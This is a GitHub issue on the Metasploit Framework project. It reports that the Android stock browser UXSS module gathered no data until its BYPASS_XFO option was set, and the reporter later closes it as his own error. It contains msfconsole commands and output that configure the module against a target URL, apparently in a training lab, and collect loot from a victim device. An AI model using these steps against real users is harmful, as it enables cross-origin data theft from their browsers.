search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.8k stars 13.9k forks source link

android_stock_browser_uxss does not collect loot unless BYPASS_XFO is set #4599

Closed joswr1ght closed 9 years ago

joswr1ght commented 9 years ago

Using the AOSP Browser on Android 4.1.2, I am unable to collect loot from a specified target URL:

msf > use auxiliary/gather/android_stock_browser_uxss 
msf auxiliary(android_stock_browser_uxss) > set URIPATH /
URIPATH => /
msf auxiliary(android_stock_browser_uxss) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://clownchat.sec575.org
TARGET_URLS => http://clownchat.sec575.org
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > 
[*] 172.16.0.105     android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105     android_stock_browser_uxss - Request 'GET /'

However, when I set BYPASS_XFO, I do collect the loot from the victim:

msf auxiliary(android_stock_browser_uxss) > kill 0
Stopping job: 0...
msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO True
BYPASS_XFO => True
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > [*] 172.16.0.105     android_stock_browser_uxss - Request 'GET /'
[*] 172.16.0.105     android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105     android_stock_browser_uxss - Request 'POST /'
[+] Collected data from URL: http://clownchat.sec575.org/activity
[+] Saved to: /root/.msf4/loot/20150116165331_default_172.16.0.105_android.client_243338.txt

In this case, the target server is NOT using X-Frame-Options, and therefore should not require the BYPASS_XFO option (and the awkward popup) for successful exploitation.

Here is a pcap file of the server responses when the BYPASS_XFO option is not set.

https://www.dropbox.com/s/rsz2m2xy6i228b7/android_browser_xss_bypass_xfo_issue.pcap?dl=0

Thanks,

-Josh

joswr1ght commented 9 years ago

Sorry, this was my mistake. The app I was attacking was setting X-Frame-Options in a roundabout way.